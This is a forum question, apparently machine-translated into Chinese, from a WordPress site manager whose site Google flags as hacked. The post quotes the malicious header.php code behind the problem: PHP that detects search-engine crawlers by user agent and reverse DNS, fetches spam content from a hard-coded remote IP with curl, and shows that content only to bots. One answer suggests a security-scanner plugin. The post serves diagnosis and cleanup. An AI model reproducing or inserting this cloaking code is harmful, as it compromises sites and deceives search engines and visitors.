Question

我是www.cuscalgary.ca的网站经理。如果你在谷歌搜索“cus calgary”，我的网站上有一些链接似乎在链接描述中有一些奇怪的，看似荷兰语的字符串（见下面的截图），例如“köpaversgrasnabb leverans”。此外，我在Google的网站主链接下收到了声名狼借的“此网站可能被黑客入侵”的消息。

到目前为止，我已尝试通过Google Chrome的网络浏览器和CTRL + F检查网页代码，以查找搜索结果中显示的字词（例如，在“联系我们”页面中尝试查找“Paul Junker”），我尝试下载主题文件夹，并通过记事本++进行“搜索文件夹”功能，以找到任何这些奇怪的字符串。我甚至尝试通过Wordpress仪表板来查找这些字符串中的任何一个。唉，我没有发现这些奇怪的字符串的迹象。

我开始认为Google可能暂时没有抓取我的网站，而且这些字符串已经被删除了。虽然，我怀疑是这种情况。

有没有人有类似的经验，他们找到了解决方案？如果是这样，我真的很感激您如何处理这种滋扰。

非常感谢您的帮助 - 感谢所有帮助。

凯尔

更新：

我可能在header.php文件中找到了罪魁祸首。查看我在下面文件开头找到的代码：

<?php

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',

                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',

                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',

                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',

                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',

                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',

                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',

                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',

                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',

                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',

                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',

                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',

                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',

                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',

                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',

                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',

                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',

                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;



if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){

    $isbot = 1;

    }



if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) 

{

    $isbot = 1;

}



if(@$isbot){



$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);

$ch = curl_init();    

    curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");   

    $result = curl_exec($ch);       

curl_close ($ch);  



    echo $result;

}

?><!DOCTYPE html>

Answer 1

有可能，是的。但是如果没有访问网站本身，很难从您列出的搜索结果中说出来。

安装像Wordfence（我喜欢的）之类的东西，让它扫描你的网站。它应该对服务器上的文件和WP repo上的文件进行比较，并在发生任何变化时提醒您。它甚至可能会告诉你其他一些你不知道的事情。

Wordpress网站被谷歌黑客攻击 - 真的吗？

1 个答案: